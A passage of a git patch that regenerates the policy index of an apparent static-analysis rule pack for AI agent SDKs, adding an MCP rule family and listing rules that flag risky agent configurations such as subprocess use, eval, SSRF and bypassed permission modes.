From d6cc1103824f7260cbba93da347f7375a3a3e5d1 Mon Sep 17 00:00:00 2001 From: Ian Jhumel Bautista Date: Thu, 4 Jun 2026 20:48:08 +0800 Subject: [PATCH 1/2] docs: reconcile rulebook with the 102-rule pack and index the mcp family The pack grew to 102 rules across 45 files (incl. the new 14-rule mcp pack), but the rulebook totals were stale and its generated indexes omitted mcp entirely. - tools/gen_index.py: add the mcp family to SDK_ORDER/SDK_LABEL/SDK_FULL so MCP rules are projected into the index instead of silently dropped. - Regenerate POLICY_INDEX.md (master + per-SDK) and add mcp/POLICY_INDEX.md; gen_index.py --check now passes at 102 rules. - README.md: correct the stale "Current totals" table to 102 shipped / 88 documented, with an honest note on the 14 undocumented MCP rules. - docs/policy-rationale-doc-template-guide.md: fix broken example paths. Authoring the 14 MCP rationale docs (MCP-001..014) remains the standing gap and is intentionally out of scope here. --- POLICY_INDEX.md | 198 ++++++++++++-------- README.md | 31 ++- claude_sdk/POLICY_INDEX.md | 57 +++--- docs/policy-rationale-doc-template-guide.md | 6 +- google_adk/POLICY_INDEX.md | 26 +-- mcp/POLICY_INDEX.md | 23 +++ openai_sdk/POLICY_INDEX.md | 67 +++---- tools/gen_index.py | 12 +- 8 files changed, 255 insertions(+), 165 deletions(-) create mode 100644 mcp/POLICY_INDEX.md diff --git a/POLICY_INDEX.md b/POLICY_INDEX.md index 72551da..1ea7828 100644 --- a/POLICY_INDEX.md +++ b/POLICY_INDEX.md @@ -1,9 +1,10 @@ # Policy index -All shipped rules across every SDK. ID prefix denotes SDK: `CSDK-` Claude -Agent SDK, `OAI-` OpenAI Agents SDK, `ADK-` Google ADK. Within an SDK: `NNN` -tool-scope, `1NN` agent / subagent scope, `2NN` repo scope. +All shipped rules across every SDK. ID prefix denotes the rule family: +`CSDK-` Claude Agent SDK, `OAI-` OpenAI Agents SDK, `ADK-` Google ADK, +`MCP-` Model Context Protocol. Within a family: `NNN` tool-scope, `1NN` +agent / subagent scope, `2NN` repo scope. Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. @@ -36,86 +37,117 @@ Users can contribute their own policies by: ## Totals -| SDK | Tool | Agent | Subagent | Repo | Total | Per-SDK index | -| ----------------- | ------ | ------ | -------- | ----- | ------ | -------------------------------------------------------- | -| Claude Agent SDK | 11 | 5 | 2 | 3 | 21 | [claude_sdk/POLICY_INDEX.md](claude_sdk/POLICY_INDEX.md) | -| OpenAI Agents SDK | 19 | 8 | 0 | 2 | 29 | [openai_sdk/POLICY_INDEX.md](openai_sdk/POLICY_INDEX.md) | -| Google ADK | 11 | 10 | 0 | 1 | 22 | [google_adk/POLICY_INDEX.md](google_adk/POLICY_INDEX.md) | -| **All** | **41** | **23** | **2** | **6** | **72** | | +| SDK | Tool | Agent | Subagent | Repo | Total | Per-SDK index | +| ---------------------- | ------ | ------ | -------- | ----- | ------- | -------------------------------------------------------- | +| Claude Agent SDK | 17 | 8 | 2 | 3 | 30 | [claude_sdk/POLICY_INDEX.md](claude_sdk/POLICY_INDEX.md) | +| OpenAI Agents SDK | 21 | 9 | 0 | 2 | 32 | [openai_sdk/POLICY_INDEX.md](openai_sdk/POLICY_INDEX.md) | +| Google ADK | 14 | 11 | 0 | 1 | 26 | [google_adk/POLICY_INDEX.md](google_adk/POLICY_INDEX.md) | +| Model Context Protocol | 14 | 0 | 0 | 0 | 14 | [mcp/POLICY_INDEX.md](mcp/POLICY_INDEX.md) | +| **All** | **66** | **28** | **2** | **6** | **102** | | ## All rules -| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | -| -- | -------- | ---------- | -------- | ---------------------------------- | ------------------------------------------------------------------------------------- | -------- | ---------- | ---- | ------------------------------------------------------------------------------------------------------------------------- | -| 1 | CSDK-001 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool has no description | low | 0.95 | 14.3 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 2 | CSDK-002 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool parameters are not type-annotated | medium | 0.90 | 36.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 3 | CSDK-003 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Network call has no timeout | high | 0.85 | 59.5 | [claude_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/network.yaml) | -| 4 | CSDK-004 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [claude_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | -| 5 | CSDK-005 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [claude_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/error_handling.yaml) | -| 6 | CSDK-006 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [claude_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | -| 7 | CSDK-007 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Ambiguous tool name | low | 0.90 | 13.5 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 8 | CSDK-008 | Claude SDK | tool | claude_sdk_tool | Tool exposes **kwargs without explicit input_schema | medium | 0.80 | 32.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | -| 9 | CSDK-009 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [claude_sdk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | -| 10 | CSDK-101 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the Bash tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 11 | CSDK-102 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebSearch tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 12 | CSDK-103 | Claude SDK | agent | claude_agent_definition | AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 13 | CSDK-104 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted filesystem-write built-ins | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 14 | CSDK-105 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebFetch tool | high | 0.75 | 52.5 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | -| 15 | CSDK-107 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [claude_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | -| 16 | CSDK-108 | Claude SDK | tool | claude_sdk_tool, mcp_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [claude_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | -| 17 | CSDK-110 | Claude SDK | subagent | claude_subagent | Subagent granted the built-in Bash tool | high | 0.90 | 63.0 | [claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | -| 18 | CSDK-111 | Claude SDK | subagent | claude_subagent | Subagent granted filesystem-write or web-fetch built-ins | high | 0.85 | 59.5 | [claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | -| 19 | CSDK-201 | Claude SDK | repo | claude_sdk | Project default permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | -| 20 | CSDK-202 | Claude SDK | repo | claude_sdk | Session permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | -| 21 | CSDK-203 | Claude SDK | repo | claude_sdk | Repo ships Claude Agent SDK code without a CLAUDE.md | low | 0.90 | 13.5 | [claude_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo_hygiene.yaml) | -| 22 | OAI-001 | OpenAI SDK | tool | openai_tool | Tool function has no docstring | low | 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 23 | OAI-002 | OpenAI SDK | tool | openai_tool | Tool function has no type-annotated parameters | medium | 0.85 | 34.0 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 24 | OAI-003 | OpenAI SDK | tool | openai_tool | Tool sets strict_mode=False | medium | 0.95 | 38.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 25 | OAI-004 | OpenAI SDK | tool | openai_tool | Tool has no failure_error_function | medium | 0.70 | 28.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 26 | OAI-005 | OpenAI SDK | tool | openai_tool | Network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 27 | OAI-006 | OpenAI SDK | tool | openai_tool | Tool accepts path without normalization | high | 0.70 | 49.0 | [openai_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/path_safety.yaml) | -| 28 | OAI-007 | OpenAI SDK | tool | openai_tool | Ambiguous tool name | low | 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 29 | OAI-008 | OpenAI SDK | tool | openai_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [openai_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/error_handling.yaml) | -| 30 | OAI-009 | OpenAI SDK | tool | openai_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | -| 31 | OAI-010 | OpenAI SDK | tool | openai_tool | Tool function prints to stdout for diagnostics | low | 0.65 | 9.8 | [openai_sdk/observability.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/observability.yaml) | -| 32 | OAI-011 | OpenAI SDK | tool | openai_tool | urllib network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 33 | OAI-012 | OpenAI SDK | tool | openai_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [openai_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/shell_safety.yaml) | -| 34 | OAI-013 | OpenAI SDK | tool | openai_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | -| 35 | OAI-014 | OpenAI SDK | tool | openai_tool | Privileged tool has no needs_approval gate | high | 0.70 | 49.0 | [openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | -| 36 | OAI-015 | OpenAI SDK | tool | openai_tool | Tool sets failure_error_function=None | high | 0.85 | 59.5 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 37 | OAI-016 | OpenAI SDK | tool | openai_tool | TypeScript tool fetch call has no AbortSignal timeout | high | 0.60 | 42.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 38 | OAI-017 | OpenAI SDK | tool | openai_tool | TypeScript tool body calls eval / new Function on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | -| 39 | OAI-018 | OpenAI SDK | tool | openai_tool | Tool builds outbound URL from non-literal value | medium | 0.55 | 22.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 40 | OAI-019 | OpenAI SDK | tool | openai_tool | TypeScript mutating tool has no idempotency key | medium | 0.50 | 20.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | -| 41 | OAI-101 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent has no input_guardrails AND wires shell or filesystem-touching tools | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 42 | OAI-102 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses tool_use_behavior="stop_on_first_tool" | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 43 | OAI-103 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | tool_choice="required" combined with reset_tool_choice=False | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 44 | OAI-104 | OpenAI SDK | agent | openai_agent | Raw Agent (not SandboxAgent) wires shell or filesystem-touching tools | medium | 0.75 | 30.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 45 | OAI-106 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires MCP servers without input_guardrails | high | 0.90 | 63.0 | [openai_sdk/mcp_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/mcp_safety.yaml) | -| 46 | OAI-109 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses WebSearchTool without input_guardrails | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 47 | OAI-110 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a content-fetching tool without output_guardrails | high | 0.60 | 42.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 48 | OAI-111 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a privileged hosted tool without needs_approval | high | 0.75 | 52.5 | [openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | -| 49 | OAI-201 | OpenAI SDK | repo | openai_agents | Project uses default OpenAI tracing | medium | 0.80 | 32.0 | [openai_sdk/tracing.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tracing.yaml) | -| 50 | OAI-202 | OpenAI SDK | repo | openai_agents | OpenAI Agents project missing CLAUDE.md | low | 0.90 | 13.5 | [openai_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/repo_hygiene.yaml) | -| 51 | ADK-001 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no docstring | low | 0.80 | 12.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 52 | ADK-002 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no type-annotated parameters | medium | 0.85 | 34.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 53 | ADK-003 | Google ADK | tool | adk_function_tool | Network call has no timeout | high | 0.85 | 59.5 | [google_adk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/network.yaml) | -| 54 | ADK-004 | Google ADK | tool | adk_function_tool | Path parameter used in I/O without normalization | high | 0.70 | 49.0 | [google_adk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/path_safety.yaml) | -| 55 | ADK-005 | Google ADK | tool | adk_function_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [google_adk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/error_handling.yaml) | -| 56 | ADK-006 | Google ADK | tool | adk_function_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [google_adk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/idempotency.yaml) | -| 57 | ADK-007 | Google ADK | tool | adk_function_tool | Ambiguous tool name | low | 0.90 | 13.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 58 | ADK-008 | Google ADK | agent | adk_llm_agent | Agent grants BashTool with no restrictive command policy | high | 0.75 | 52.5 | [google_adk/builtin_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/builtin_tools.yaml) | -| 59 | ADK-009 | Google ADK | tool | adk_function_tool | FunctionTool body prints to stdout | low | 0.70 | 10.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | -| 60 | ADK-010 | Google ADK | tool | adk_function_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [google_adk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/shell_safety.yaml) | -| 61 | ADK-011 | Google ADK | tool | adk_function_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [google_adk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | -| 62 | ADK-012 | Google ADK | tool | adk_function_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [google_adk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | -| 63 | ADK-101 | Google ADK | agent | adk_llm_agent | LlmAgent has no description | medium | 0.85 | 34.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 64 | ADK-102 | Google ADK | agent | adk_llm_agent | Agent with BashTool has no before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 65 | ADK-103 | Google ADK | agent | adk_llm_agent | Sub-agent is granted BashTool | high | 0.90 | 63.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 66 | ADK-104 | Google ADK | agent | adk_llm_agent | Agent has no safety_settings | medium | 0.75 | 30.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 67 | ADK-105 | Google ADK | agent | adk_llm_agent | Agent uses web search built-in without before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 68 | ADK-106 | Google ADK | agent | adk_llm_agent | Agent has a code_executor but no before_model_callback | high | 0.80 | 56.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 69 | ADK-107 | Google ADK | agent | adk_llm_agent | Agent grants AgentTool but has no before_tool_callback | high | 0.70 | 49.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 70 | ADK-108 | Google ADK | agent | adk_loop_agent | LoopAgent has no max_iterations | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 71 | ADK-110 | Google ADK | agent | adk_llm_agent | Agent fetches web content via UrlContextTool/LoadWebPage without before_tool_callback | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 72 | ADK-201 | Google ADK | repo | google_adk | Google ADK project missing CLAUDE.md | low | 0.90 | 13.5 | [google_adk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/repo_hygiene.yaml) | +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| --- | -------- | ---------- | -------- | ---------------------------------- | ------------------------------------------------------------------------------------- | -------- | ---------- | ---- | ------------------------------------------------------------------------------------------------------------------------- | +| 1 | CSDK-001 | Claude SDK | tool | claude_sdk_tool | Tool has no description | low | 0.95 | 14.3 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 2 | CSDK-002 | Claude SDK | tool | claude_sdk_tool | Tool parameters are not type-annotated | medium | 0.90 | 36.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 3 | CSDK-003 | Claude SDK | tool | claude_sdk_tool | Network call has no timeout | high | 0.85 | 59.5 | [claude_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/network.yaml) | +| 4 | CSDK-004 | Claude SDK | tool | claude_sdk_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [claude_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | +| 5 | CSDK-005 | Claude SDK | tool | claude_sdk_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [claude_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/error_handling.yaml) | +| 6 | CSDK-006 | Claude SDK | tool | claude_sdk_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [claude_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | +| 7 | CSDK-007 | Claude SDK | tool | claude_sdk_tool | Ambiguous tool name | low | 0.90 | 13.5 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 8 | CSDK-008 | Claude SDK | tool | claude_sdk_tool | Tool exposes **kwargs without explicit input_schema | medium | 0.80 | 32.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 9 | CSDK-009 | Claude SDK | tool | claude_sdk_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [claude_sdk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | +| 10 | CSDK-010 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool shells out to the OS | high | 0.70 | 49.0 | [claude_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | +| 11 | CSDK-011 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool evaluates dynamic code | high | 0.90 | 63.0 | [claude_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | +| 12 | CSDK-012 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool writes to the filesystem | medium | 0.50 | 20.0 | [claude_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | +| 13 | CSDK-013 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [claude_sdk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | +| 14 | CSDK-014 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool has no description | low | 0.90 | 13.5 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 15 | CSDK-016 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK mutating tool has no idempotency key | medium | 0.50 | 20.0 | [claude_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | +| 16 | CSDK-101 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the Bash tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 17 | CSDK-102 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebSearch tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 18 | CSDK-103 | Claude SDK | agent | claude_agent_definition | AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 19 | CSDK-104 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted filesystem-write built-ins | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 20 | CSDK-105 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebFetch tool | high | 0.75 | 52.5 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 21 | CSDK-107 | Claude SDK | tool | claude_sdk_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [claude_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | +| 22 | CSDK-108 | Claude SDK | tool | claude_sdk_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [claude_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | +| 23 | CSDK-110 | Claude SDK | subagent | claude_subagent | Subagent granted the built-in Bash tool | high | 0.90 | 63.0 | [claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | +| 24 | CSDK-111 | Claude SDK | subagent | claude_subagent | Subagent granted filesystem-write or web-fetch built-ins | high | 0.85 | 59.5 | [claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | +| 25 | CSDK-120 | Claude SDK | agent | claude_agent_definition | TypeScript AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 26 | CSDK-130 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted the Bash tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 27 | CSDK-131 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted filesystem-write or web-fetch built-ins | high | 0.75 | 52.5 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 28 | CSDK-201 | Claude SDK | repo | claude_sdk | Project default permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | +| 29 | CSDK-202 | Claude SDK | repo | claude_sdk | Session permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | +| 30 | CSDK-203 | Claude SDK | repo | claude_sdk | Repo ships Claude Agent SDK code without an agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [claude_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo_hygiene.yaml) | +| 31 | OAI-001 | OpenAI SDK | tool | openai_tool | Tool function has no docstring | low | 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 32 | OAI-002 | OpenAI SDK | tool | openai_tool | Tool function has no type-annotated parameters | medium | 0.85 | 34.0 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 33 | OAI-003 | OpenAI SDK | tool | openai_tool | Tool sets strict_mode=False | medium | 0.95 | 38.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 34 | OAI-004 | OpenAI SDK | tool | openai_tool | 